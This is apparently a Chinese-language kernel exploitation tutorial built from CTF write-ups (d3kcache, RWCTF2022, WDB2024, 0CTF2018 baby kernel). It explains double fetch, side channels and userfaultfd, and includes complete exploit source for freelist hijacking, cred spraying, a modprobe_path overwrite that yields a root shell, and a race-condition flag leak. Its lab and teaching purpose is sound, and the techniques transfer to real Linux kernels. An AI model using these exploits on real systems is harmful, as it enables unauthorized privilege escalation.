" mov r15, rsi; " " xor esi, esi; " " xor edx, edx; " " xor r10d, r10d; " " xor r8d, r8d; " " xor r9d, r9d; " " mov eax, 56; " " syscall; " " cmp eax, 0; " " je child_fn; " " ret; " "child_fn: " " jmp r15; " ) ;} void unshare_setup (void ) { char edit[0x100 ]; int tmp_fd; unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET); tmp_fd = open("/proc/self/setgroups" , O_WRONLY); write(tmp_fd, "deny" , strlen ("deny" )); close(tmp_fd); tmp_fd = open("/proc/self/uid_map" , O_WRONLY); snprintf (edit, sizeof (edit), "0 %d 1" , getuid()); write(tmp_fd, edit, strlen (edit)); close(tmp_fd); tmp_fd = open("/proc/self/gid_map" , O_WRONLY); snprintf (edit, sizeof (edit), "0 %d 1" , getgid()); write(tmp_fd, edit, strlen (edit)); close(tmp_fd); } #define PGV_PAGE_NUM 1000 #define PACKET_VERSION 10 #define PACKET_TX_RING 13 struct tpacket_req { unsigned int tp_block_size; unsigned int tp_block_nr; unsigned int tp_frame_size; unsigned int tp_frame_nr; }; struct pgv_page_request { int idx; int cmd; unsigned int size; unsigned int nr; }; enum { CMD_ALLOC_PAGE, CMD_FREE_PAGE, CMD_EXIT, }; enum 
tpacket_versions { TPACKET_V1, TPACKET_V2, TPACKET_V3, }; int cmd_pipe_req[2 ], cmd_pipe_reply[2 ];int create_socket_and_alloc_pages (unsigned int size, unsigned int nr) { struct tpacket_req req ; int socket_fd, version; int ret; socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET); if (socket_fd < 0 ) { printf ("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n" ); ret = socket_fd; goto err_out; } version = TPACKET_V1; ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof (version)); if (ret < 0 ) { printf ("[x] failed at setsockopt(PACKET_VERSION)\n" ); goto err_setsockopt; } memset (&req, 0 , sizeof (req)); req.tp_block_size = size; req.tp_block_nr = nr; req.tp_frame_size = 0x1000 ; req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size; ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof (req)); if (ret < 0 ) { printf ("[x] failed at setsockopt(PACKET_TX_RING)\n" ); goto err_setsockopt; } return socket_fd; err_setsockopt: close(socket_fd); err_out: return ret; } int alloc_page (int idx, unsigned int size, unsigned int nr) { struct pgv_page_request req = { .idx = idx, .cmd = CMD_ALLOC_PAGE, .size = size, .nr = nr, }; int ret; write(cmd_pipe_req[1 ], &req, sizeof (struct pgv_page_request)); read(cmd_pipe_reply[0 ], &ret, sizeof (ret)); return ret; } int free_page (int idx) { struct pgv_page_request req = { .idx = idx, .cmd = CMD_FREE_PAGE, }; int ret; write(cmd_pipe_req[1 ], &req, sizeof (req)); read(cmd_pipe_reply[0 ], &ret, sizeof (ret)); return ret; } void spray_cmd_handler (void ) { struct pgv_page_request req ; int socket_fd[PGV_PAGE_NUM]; int ret; unshare_setup(); do { read(cmd_pipe_req[0 ], &req, sizeof (req)); if (req.cmd == CMD_ALLOC_PAGE) { ret = create_socket_and_alloc_pages(req.size, req.nr); socket_fd[req.idx] = ret; } else if (req.cmd == CMD_FREE_PAGE) { ret = close(socket_fd[req.idx]); } else { printf ("[x] invalid request: %d\n" , req.cmd); } write(cmd_pipe_reply[1 ], &ret, sizeof (ret)); 
} while (req.cmd != CMD_EXIT); } void prepare_pgv_system (void ) { pipe(cmd_pipe_req); pipe(cmd_pipe_reply); if (!fork()) { spray_cmd_handler(); } } void bind_core (int core) { cpu_set_t cpu_set; CPU_ZERO(&cpu_set); CPU_SET(core, &cpu_set); sched_setaffinity(getpid(), sizeof (cpu_set), &cpu_set); } int main () { char buf[0x1000 ]; bind_core(0 ); dev_fd = open("/dev/castaway" , O_RDWR); if (dev_fd < 0 ) { err_exit("FAILED to open castaway device!" ); } prepare_pgv_system(); puts ("[*] spraying pgv pages..." ); for (int i = 0 ; i < PGV_PAGE_NUM; i++) { if (alloc_page(i, getpagesize(), 1 ) < 0 ) { printf ("[x] failed at no.%d socket\n" , i); err_exit("FAILED to spray pages via socket!" ); } } puts ("[*] freeing for cred pages..." ); for (int i = 1 ; i < PGV_PAGE_NUM; i += 2 ) { free_page(i); } puts ("[*] spraying cred..." ); pipe(check_root_pipe); for (int i = 0 ; i < CRED_SPRAY_NUM; i++) { if (simple_clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND, waiting_for_root_fn) < 0 ) { printf ("[x] failed at cloning %d child\n" , i); err_exit("FAILED to clone()!" ); } } puts ("[*] freeing for vulnerable pages..." ); for (int i = 0 ; i < PGV_PAGE_NUM; i += 2 ) { free_page(i); } puts ("[*] trigerring vulnerability in castaway kernel module..." ); memset (buf, 0 , sizeof (buf)); *(uint32_t *) &buf[VUL_OBJ_SIZE - 6 ] = 1 ; for (int i = 0 ; i < VUL_OBJ_NUM; i++) { alloc(); edit(i, VUL_OBJ_SIZE, buf); } puts ("[*] notifying child processes and waiting..." ); write(check_root_pipe[1 ], buf, CRED_SPRAY_NUM); sleep(100000000 ); return 0 ; }
D^3CTF2023 d3kcache 题目分析 利用思路 exp RWCTF2022 Digging into kernel 1 & 2 题目分析 start.sh
1 2 3 4 5 6 7 8 9 10 #!/bin/sh qemu-system-x86_64 \ -kernel bzImage \ -initrd rootfs.img \ -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init quiet noapic kalsr" \ -cpu kvm64,+smep,+smap \ -monitor null \ --nographic \ -s
逆向分析
1 2 3 4 5 6 7 8 9 10 11 int __cdecl xkmod_init () { kmem_cache *v0; printk(&unk_1E4); misc_register(&xkmod_device); v0 = (kmem_cache *)kmem_cache_create("lalala" , 192LL , 0LL , 0LL , 0LL ); buf = 0LL ; s = v0; return 0 ; }
1 2 3 4 int __fastcall xkmod_release (inode *inode, file *file) { return kmem_cache_free(s, buf); }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 void __fastcall xkmod_ioctl (__int64 a1, int a2, __int64 a3) { __int64 data; unsigned int idx; unsigned int size; unsigned __int64 v6; v6 = __readgsqword(0x28 u); if ( a3 ) { copy_from_user(&data, a3, 0x10 LL); if ( a2 == 0x6666666 ) { if ( buf && size <= 0x50 && idx <= 0x70 ) { copy_from_user((char *)buf + (int )idx, data, (int )size); return ; } } else { if ( a2 != 0x7777777 ) { if ( a2 == 0x1111111 ) buf = (void *)kmem_cache_alloc(s, 0xCC0 LL); return ; } if ( buf && size <= 0x50 && idx <= 0x70 ) { ((void (__fastcall *)(__int64, char *, int ))copy_to_user)(data, (char *)buf + (int )idx, size); return ; } } xkmod_ioctl_cold(); } }
利用思路 关于内核基址获取,在内核堆基址(page_offset_base) + 0x9d000 处存放着 secondary_startup_64 函数的地址,而我们可以从 free object 的 next 指针获得一个堆上地址,从而去找堆的基址,之后分配到一个堆基址 + 0x9d000 处的 object 以泄露内核基址,这个地址前面刚好有一片为 NULL 的区域方便我们分配。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 #define __PAGE_OFFSET page_offset_base #define PAGE_OFFSET ((unsigned long)__PAGE_OFFSET) #define __va(x) ((void *)((unsigned long)(x)+PAGE_OFFSET)) trampoline_header = (struct trampoline_header *) __va(real_mode_header->trampoline_header); ... trampoline_header->start = (u64) secondary_startup_64; [......] .text:FFFFFFFF81000030 ; void secondary_startup_64 () [......] pwndbg>x/40gx (0xffff9f5d40000000 +0x9d000 -0x20 0xffff9f5d4009cfe0 : 0X0000000000000000 0X0000000000000000 0xffff9f5d4009cff0 : 0X0000000000000000 0X0000000005c0c067 0xffff9f5d4009d000 : 0xffffffff97c00030 0X0000000000000901 0xffff9f5d4009d010 : 0X00000000000006b0 0X0000000000000000 0xffff9f5d4009d020 : 0X0000000000000000 0X0000000000000000
至于 page_offset_base 可以通过 object 上的 free list 泄露的堆地址与上 0xFFFFFFFFF0000000 获取。不同版本可查看vmmap。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <asm/ldt.h> #include <assert.h> #include <ctype.h> #include <errno.h> #include <fcntl.h> #include <linux/keyctl.h> #include <linux/userfaultfd.h> #include <poll.h> #include <pthread.h> #include <sched.h> #include <semaphore.h> #include <signal.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/msg.h> #include <sys/prctl.h> #include <sys/sem.h> #include <sys/shm.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/xattr.h> #include <unistd.h> #include <sys/io.h> size_t modprobe_path = 0xFFFFFFFF82444700 ;void qword_dump (char *desc, void *addr, int len) { uint64_t *buf64 = (uint64_t *) addr; uint8_t *buf8 = (uint8_t *) addr; if (desc != NULL ) { printf ("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' 
); } puts ("" ); } } struct Data { size_t *buf; u_int32_t offset; u_int32_t size; }; void alloc_buf (int fd, struct Data *data) { ioctl(fd, 0x1111111 , data); } void write_buf (int fd, struct Data *data) { ioctl(fd, 0x6666666 , data); } void read_buf (int fd, struct Data *data) { ioctl(fd, 0x7777777 , data); } int main () { int xkmod_fd[5 ]; for (int i = 0 ; i < 5 ; i++) { xkmod_fd[i] = open("/dev/xkmod" , O_RDONLY); if (xkmod_fd[i] < 0 ) { printf ("[-] %d Failed to open xkmod." , i); exit (-1 ); } } struct Data data = {malloc (0x1000 ), 0 , 0x50 }; alloc_buf(xkmod_fd[0 ], &data); close(xkmod_fd[0 ]); read_buf(xkmod_fd[1 ], &data); qword_dump("buf" , data.buf, 0x50 ); size_t page_offset_base = data.buf[0 ] & 0xFFFFFFFFF0000000 ; printf ("[+] page_offset_base: %p\n" , page_offset_base); data.buf[0 ] = page_offset_base + 0x9d000 - 0x10 ; write_buf(xkmod_fd[1 ], &data); alloc_buf(xkmod_fd[1 ], &data); alloc_buf(xkmod_fd[1 ], &data); data.size = 0x50 ; read_buf(xkmod_fd[1 ], &data); qword_dump("buf" , data.buf, 0x50 ); size_t kernel_offset = data.buf[2 ] - 0xffffffff81000030 ; printf ("kernel offset: %p\n" , kernel_offset); modprobe_path += kernel_offset; close(xkmod_fd[1 ]); data.buf[0 ] = modprobe_path - 0x10 ; write_buf(xkmod_fd[2 ], &data); alloc_buf(xkmod_fd[2 ], &data); alloc_buf(xkmod_fd[2 ], &data); strcpy ((char *) &data.buf[2 ], "/home/shell.sh" ); write_buf(xkmod_fd[2 ], &data); system("echo '#!/bin/sh' >> /home/shell.sh" ); system("echo 'setsid cttyhack setuidgid 0 sh' >> /home/shell.sh" ); system("chmod +x /home/shell.sh" ); system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake" ); system("chmod +x /home/fake" ); system("/home/fake" ); return 0 ; }
WDB2024 PWN03 利用思路 一道非常简单的内核题,基本上和RWCTF2022 Digging into kernel 1 & 2是一样的,这道题大家拿去练手即可,建议大家自行分析题目,我只把我的exp贴在下面,但是建议大家自己写一个exp。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <asm/ldt.h> #include <assert.h> #include <ctype.h> #include <errno.h> #include <fcntl.h> #include <linux/keyctl.h> #include <linux/userfaultfd.h> #include <poll.h> #include <pthread.h> #include <sched.h> #include <semaphore.h> #include <signal.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/msg.h> #include <sys/prctl.h> #include <sys/sem.h> #include <sys/shm.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/xattr.h> #include <unistd.h> #include <sys/io.h> size_t modprobe_path = 0xFFFFFFFF81E58B80 ;void qword_dump (char *desc, void *addr, int len) { uint64_t *buf64 = (uint64_t *) addr; uint8_t *buf8 = (uint8_t *) addr; if (desc != NULL ) { printf ("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' 
); } puts ("" ); } } void alloc_buf (int fd, int size) { printf ("[+] kmalloc %d\n" , size); ioctl(fd, 0x0 , size); } void free_buf (int fd) { printf ("[+] kfree\n" ); ioctl(fd, 0x1 , 0 ); } void read_buf (int fd, size_t * buf, int size) { printf ("[+] copy_to_user %d\n" , size); read(fd, buf, size); qword_dump("read_buf" , buf, size); } void write_buf (int fd, size_t * buf, int size) { printf ("[+] copy_from_user %d\n" , size); qword_dump("write_buf" , buf, size); write(fd, buf, size); } int main () { size_t * buf = malloc (0x500 ); int easy_fd; easy_fd = open("/dev/easy" , O_RDWR); alloc_buf(easy_fd, 0xa8 ); free_buf(easy_fd); read_buf(easy_fd, buf, 0xa8 ); size_t page_offset_base = buf[0 ] & 0xFFFFFFFFF0000000 ; printf ("[*] page_offset_base %p\n" , page_offset_base); buf[0 ] = page_offset_base + 0x9d000 - 0x10 ; write_buf(easy_fd, buf, 0x8 ); alloc_buf(easy_fd, 0xa8 ); alloc_buf(easy_fd, 0xa8 ); read_buf(easy_fd, buf, 0xa8 ); size_t kernel_offset = buf[2 ] - 0xFFFFFFFF81000110 ; printf ("[*] kernel offset: %p\n" , kernel_offset); modprobe_path += kernel_offset; buf[0 ] = modprobe_path - 0x20 ; alloc_buf(easy_fd, 0xa8 ); free_buf(easy_fd); write_buf(easy_fd, buf, 0x8 ); alloc_buf(easy_fd, 0xa8 ); alloc_buf(easy_fd, 0xa8 ); read_buf(easy_fd, buf, 0x20 ); strcpy ((char *) &buf[4 ], "/tmp/shell.sh\x00" ); write_buf(easy_fd, buf, 0x30 ); system("echo '#!/bin/sh' >> /tmp/shell.sh" ); system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /tmp/shell.sh" ); system("chmod +x /tmp/shell.sh" ); system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake" ); system("chmod +x /tmp/fake" ); system("/tmp/fake" ); return 0 ; }
内核条件竞争 通常情况下在用户态下的 pwn 当中我们只有一个独立运行的主线程,并不存在所谓条件竞争的情况,但在 kernel pwn 当中由攻击者负责编写用户态程序,可以很轻易地启动多个线程同时运行 ,从而轻易地产生条件竞争
double fetch 利用思路 double fetch 直译就是 取值两次,直接理解就是在一次操作当中要两次(或是多次)重新获取某个对象的值 ,可能出现在下面这种情况当中:
有一大段数据要从用户空间传给内核空间,但是直接传送整块数据会造成较大的开销,故选择只向内核传送一个指向用户地址空间的指针
在后续的操作当中内核需要多次 通过该指针获取到用户空间的数据
一个典型的 Double Fetch 漏洞原理如下图所示,一个用户态线程准备数据并通过系统调用进入内核,该数据在内核中有两次被取用,内核第一次取用数据进行安全检查(如缓冲区大小、指针可用性等),当检查通过后内核第二次取用数据进行实际处理。而在两次取用数据之间,另一个用户态线程可创造条件竞争,对已通过检查的用户态数据进行篡改,在真实使用时造成访问越界或缓冲区溢出,最终导致内核崩溃或权限提升。
不难看出,若是整个操作流程过长,则用户进程便有机会修改这一块数据,使得内核在两次访问这块空间时所获得的数据不一致,从而使得内核进入不同的执行流程 ,用户进程甚至可以直接开新的线程进行竞争来实现这个效果
通过在 first fetch 与 second fetch 之间的空档修改数据从而改变内核执行流的利用手法便被称之为 double fetch。
0CTF2018 Final baby kernel 题目分析 start.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/sh qemu-system-x86_64 \ -m 256M -smp 2,cores=2,threads=1 \ -kernel ./vmlinuz-4.15.0-22-generic \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \ -cpu qemu64 \ -monitor /dev/null \ -netdev user,id =t0, -device e1000,netdev=t0,id =nic0 \ -nographic \ -s
逆向分析
其中参数 0x6666 可以获得 flag 在内核中的地址,参数 0x1337 则会将我们传入的 flag 与真正的 flag 进行对比,若正确则会将 flag 打印出来,并且题目没有禁用dmesg。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 signed __int64 __fastcall baby_ioctl (__int64 a1, attr *a2) { attr *v2; int i; attr *v5; _fentry__(a1, a2); v5 = v2; if ( (_DWORD)a2 == 0x6666 ) { printk("Your flag is at %px! But I don't think you know it's content\n" , flag); return 0LL ; } else if ( (_DWORD)a2 == 0x1337 && !_chk_range_not_ok( (__int64)v2, 0x10 LL, *(_QWORD *)(__readgsqword((unsigned int )¤t_task) + 0x1358 )) && !_chk_range_not_ok( v5->flag_str, SLODWORD(v5->flag_len), *(_QWORD *)(__readgsqword((unsigned int )¤t_task) + 0x1358 )) && LODWORD(v5->flag_len) == strlen (flag) ) { for ( i = 0 ; i < strlen (flag); ++i ) { if ( *(_BYTE *)(v5->flag_str + i) != flag[i] ) return 0x16 LL; } printk("Looks like the flag is not a secret anymore. So here is it %s\n" , flag); return 0LL ; } else { return 0xE LL; } }
简单分析可知我们应当传入如下结构体,其中 flag_len 参数与 flag 的长度对比,在 .ko 文件中 flag 的长度为 33。
1 2 3 4 00000000 attr struc ; (sizeof =0x10 , mappedto_3)00000000 flag_str dq ?00000008 flag_len dq ?00000010 attr ends
在 0x1337 功能当中还会通过 _chk_range_not_ok() 函数检查我们传入的地址范围是否合法,add 指令会影响 CF(产生进位/借位)和 OF(两数最高位相同,结果最高位改变)标志位,v3获得的就是两数相加的 CF 位,这里一般为0(除非你传入 0xffffffffffffffff 附近的数),所以我们直接看另一个判断:range 是否小于 v4。
range 取自 current_task 偏移 0x1358 处保存的值(在 4.15 内核中应为 current->thread.addr_limit,也就是 user_addr_max() 的返回值),而 v4 则是我们传入的 flag 的结束地址(起始地址 + 长度),即传入的 flag 的结束地址不能大于这个值。以 root 调试一下可以发现这个值为 0x7ffffffff000,这正好是用户地址空间的上界(用户栈所在区域的顶端),也就是说我们传入的 flag 不能位于用户地址空间之外。
1 2 3 4 5 6 7 8 9 bool __fastcall _chk_range_not_ok(__int64 flag_str, __int64 flag_len, unsigned __int64 range){ bool v3; unsigned __int64 v4; v3 = __CFADD__(flag_len, flag_str); v4 = flag_len + flag_str; return v3 || range < v4; }
利用思路 虽然 flag 存储的地址已知,但是位于内核地址空间当中,我们将之直接传给模块并不能通过验证,那么这里就考虑 double fetch——先传入一个用户地址空间上的合法地址,开另一个线程进行竞争不断修改其为内核空间 flag 的地址,只要有一次命中我们便能获得 flag。
/*
 * exp
 *
 * Double-fetch race against /dev/baby: the main thread keeps submitting an
 * attr whose flag_addr points at a user buffer (so the range check passes)
 * while a second thread keeps rewriting flag_addr to the kernel address of
 * the real flag. When the rewrite lands between check and compare, the module
 * compares the flag with itself and prints it to dmesg.
 */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdint.h>
#include <stdatomic.h>
#include <sys/ioctl.h>

#define ADDR_PREFIX "Your flag is at "
#define TEMP_SIZE 0x1000

pthread_t compete_thread;
void *real_addr;
char buf[0x20] = "arttnba3";
int competetion_times = 0x1000;
atomic_int status = 1; /* cleared by main() once the flag shows up in dmesg */

struct {
    /* volatile: the kernel reads this field behind the compiler's back, so
     * every store in both racing loops must really be emitted. */
    char *volatile flag_addr;
    int flag_len;
} flag = {.flag_addr = buf, .flag_len = 33};

/* Racing thread: keep pointing flag.flag_addr at the kernel flag address. */
void *competetionThread(void *arg)
{
    (void)arg;
    while (atomic_load(&status)) {
        for (int i = 0; i < competetion_times; i++) {
            flag.flag_addr = real_addr;
        }
    }
    return NULL;
}

/*
 * Read at most cap - 1 bytes of `path` into `dst` and NUL-terminate it.
 * Returns the number of bytes read, or -1 on error.
 */
static ssize_t slurp(const char *path, char *dst, size_t cap)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) {
        return -1;
    }
    ssize_t n = read(fd, dst, cap - 1);
    close(fd); /* closed on every call; the polling loop runs many times */
    if (n < 0) {
        return -1;
    }
    dst[n] = '\0';
    return n;
}

int main(int argc, char **argv, char **envp)
{
    (void)argc;
    (void)argv;
    (void)envp;

    int fd = open("/dev/baby", O_RDWR);
    if (fd < 0) {
        perror("[x] open /dev/baby");
        return EXIT_FAILURE;
    }

    char *temp = malloc(TEMP_SIZE);
    if (temp == NULL) {
        perror("[x] malloc");
        return EXIT_FAILURE;
    }

    /* cmd 0x6666 makes the module printk the flag's kernel address. */
    ioctl(fd, 0x6666);
    system("dmesg | grep flag > addr.txt");
    if (slurp("./addr.txt", temp, TEMP_SIZE) < 0) {
        perror("[x] read addr.txt");
        return EXIT_FAILURE;
    }

    char *hit = strstr(temp, ADDR_PREFIX);
    if (hit == NULL) {
        fputs("[x] flag address not found in dmesg\n", stderr);
        return EXIT_FAILURE;
    }
    /* endptr is an output parameter; pass NULL since it is not needed. */
    real_addr = (void *)(uintptr_t)strtoull(hit + strlen(ADDR_PREFIX), NULL, 16);
    printf("[+] flag addr: %p\n", real_addr);

    if (pthread_create(&compete_thread, NULL, competetionThread, NULL) != 0) {
        fputs("[x] pthread_create failed\n", stderr);
        return EXIT_FAILURE;
    }

    while (atomic_load(&status)) {
        for (int i = 0; i < competetion_times; i++) {
            flag.flag_addr = buf; /* restore a pointer that passes the check */
            ioctl(fd, 0x1337, &flag);
        }
        system("dmesg | grep flag > result.txt");
        if (slurp("./result.txt", temp, TEMP_SIZE) > 0 && strstr(temp, "flag{")) {
            atomic_store(&status, 0);
        }
    }

    /* The racer exits by itself once status is 0; its busy loop contains no
     * cancellation point, so pthread_cancel() would never take effect. */
    pthread_join(compete_thread, NULL);
    printf("[+] competetion end!\n");
    system("dmesg | grep flag");

    free(temp);
    close(fd);
    return 0;
}
侧信道攻击 利用思路 在进行比对时并没有检验 flag 地址的合法性,考虑如下内存布局:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
我们将 flag 放在通过 mmap 分配而来的内存页的末尾,其最后一个字符 X 是我们将要爆破的未知字符
对于待比对字符 X 而言,若是比对失败则 ioctl 会直接返回,若是比对成功则指针移动到下一张内存页中进行解引用,此时将会直接造成 kernel panic
由于 flag 被硬编码在 .ko 文件中,故通过是否造成 kernel panic 可以逐字符爆破 flag 内容
ASCII 可见字符 95 个,flag 长度 33,减去开头 flag{ 与末尾 } 共 6 个字符后还剩 27 个未知字符,因此最多只需要爆破 27 * 95 = 2565 次便能够获得 flag
比较需要耐心(因为打远程传文件很麻烦),这里附上一个比较方便的 exp,不用每次打都重新编译一次,只需要将 flag 作为参数传进去就行了:
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <sys/mman.h> #include <sys/types.h> struct { char * flag_addr; int flag_len; }flag = { .flag_len = 33 }; int main (int argc, char ** argv, char ** envp) { int fd, flag_len; char * buf, *flag_addr; if (argc < 2 ) { puts ("usage: ./exp flag" ); exit (-1 ); } flag_len = strlen (argv[1 ]); fd = open("/dev/baby" , O_RDWR); buf = (char *) mmap(NULL , 0x1000 , PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1 , 0 ); flag_addr = buf + 0x1000 - flag_len; memcpy (flag_addr, argv[1 ], flag_len); flag.flag_addr = flag_addr; ioctl(fd, 0x1337 , &flag); return 0 ; }
userfaultfd 利用思路 严格意义而言 userfaultfd 并非是一种利用手法,而是 Linux 的一个系统调用 ,简单来说,通过 userfaultfd 这种机制,用户可以通过自定义的 page fault handler 在用户态处理缺页异常
下面的这张图很好地体现了 userfaultfd 的整个流程:
要使用 userfaultfd 系统调用,我们首先要注册一个 userfaultfd,通过 ioctl 监视一块内存区域,同时还需要专门启动一个用以进行轮询的线程 uffd monitor,该线程会通过 poll() 函数不断轮询直到出现缺页异常
当有一个线程在这块内存区域内触发缺页异常时(比如说第一次访问一个匿名页),该线程(称之为 faulting 线程)进入到内核中处理缺页异常
内核会调用 handle_userfault() 交由 userfaultfd 处理
随后 faulting 线程进入堵塞状态,同时将一个 uffd_msg 发送给 monitor 线程,等待其处理结束
monitor 线程通过调用 ioctl 来处理缺页异常,有如下选项:
UFFDIO_COPY:将用户自定义数据拷贝到 faulting page 上
UFFDIO_ZEROPAGE :将 faulting page 置0
UFFDIO_WAKE:用于配合上面两项中 UFFDIO_COPY_MODE_DONTWAKE 和 UFFDIO_ZEROPAGE_MODE_DONTWAKE 模式实现批量填充
在处理结束后 monitor 线程发送信号唤醒 faulting 线程继续工作
以上便是 userfaultfd 这个机制的整个流程,该机制最初被设计来用以进行虚拟机/进程的迁移等用途,但是通过这个机制我们可以控制进程执行流程的先后顺序,从而使得对条件竞争的利用成功率大幅提高
考虑在内核模块当中有一个菜单堆的情况,其中的操作都没有加锁,那么便存在条件竞争的可能,考虑如下竞争情况:
此时线程1便有可能编辑到被释放的堆块 ,若是此时恰好我们又将这个堆块申请到了合适的位置(比如说 tty_operations),那么我们便可以完成对该堆块的重写,从而进行下一步利用
但是毫无疑问的是,若是直接开两个线程进行竞争,命中的几率是比较低的,我们也很难判断是否命中
但假如线程1使用诸如 copy_from_user 、copy_to_user 等方法在用户空间与内核空间之间拷贝数据,那么我们便可以:
先用 mmap 分一块匿名内存,为其注册 userfaultfd,由于我们是使用 mmap 分配的匿名内存,此时该块内存并没有实际分配物理内存页
线程1在内核中在这块内存与内核对象间进行数据拷贝,在访问注册了 userfaultfd 内存时便会触发缺页异常,陷入阻塞,控制权转交 userfaultfd 的 uffd monitor 线程
在 uffd monitor 线程中我们便能对线程1正在操作的内核对象进行恶意操作 (例如覆写线程1正在读写的内核对象,或是将线程1正在读写的内核对象释放掉后再分配到我们想要的地方)
此时再让线程1继续执行,线程 1 便会向我们想要写入的目标写入特定数据/从我们想要读取的目标读取特定数据 了
由此,我们便成功利用 userfaultfd 完成了对条件竞争漏洞的利用,这项技术的存在使得条件竞争的命中率大幅提高
以下代码参考自 Linux man page,略有改动
首先定义接下来需要用到的一些数据结构
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 #include <sys/types.h> #include <stdio.h> #include <linux/userfaultfd.h> #include <pthread.h> #include <errno.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <signal.h> #include <poll.h> #include <string.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/ioctl.h> #include <poll.h> void errExit (char * msg) { puts (msg); exit (-1 ); } long uffd; char *addr; unsigned long len; pthread_t thr; struct uffdio_api uffdio_api ;struct uffdio_register uffdio_register ;
首先通过 userfaultfd 系统调用注册一个 userfaultfd,其中 O_CLOEXEC 和 O_NONBLOCK 和 open 的 flags 相同,笔者个人认为这里可以理解为我们创建了一个虚拟设备 userfault
这里用 mmap 分一个匿名页用作后续被监视的区域
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); if (uffd == -1 ) errExit("userfaultfd" ); uffdio_api.api = UFFD_API; uffdio_api.features = 0 ; if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1 ) errExit("ioctl-UFFDIO_API" ); len = 0x1000 ; addr = (char *) mmap(NULL , len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); if (addr == MAP_FAILED) errExit("mmap" );
为这块内存区域注册 userfaultfd
1 2 3 4 5 6 7 8 9 /* Register the memory range of the mapping we just created for handling by the userfaultfd object. In mode, we request to track missing pages (i.e., pages that have not yet been faulted in). */ uffdio_register.range.start = (unsigned long) addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) errExit("ioctl-UFFDIO_REGISTER");
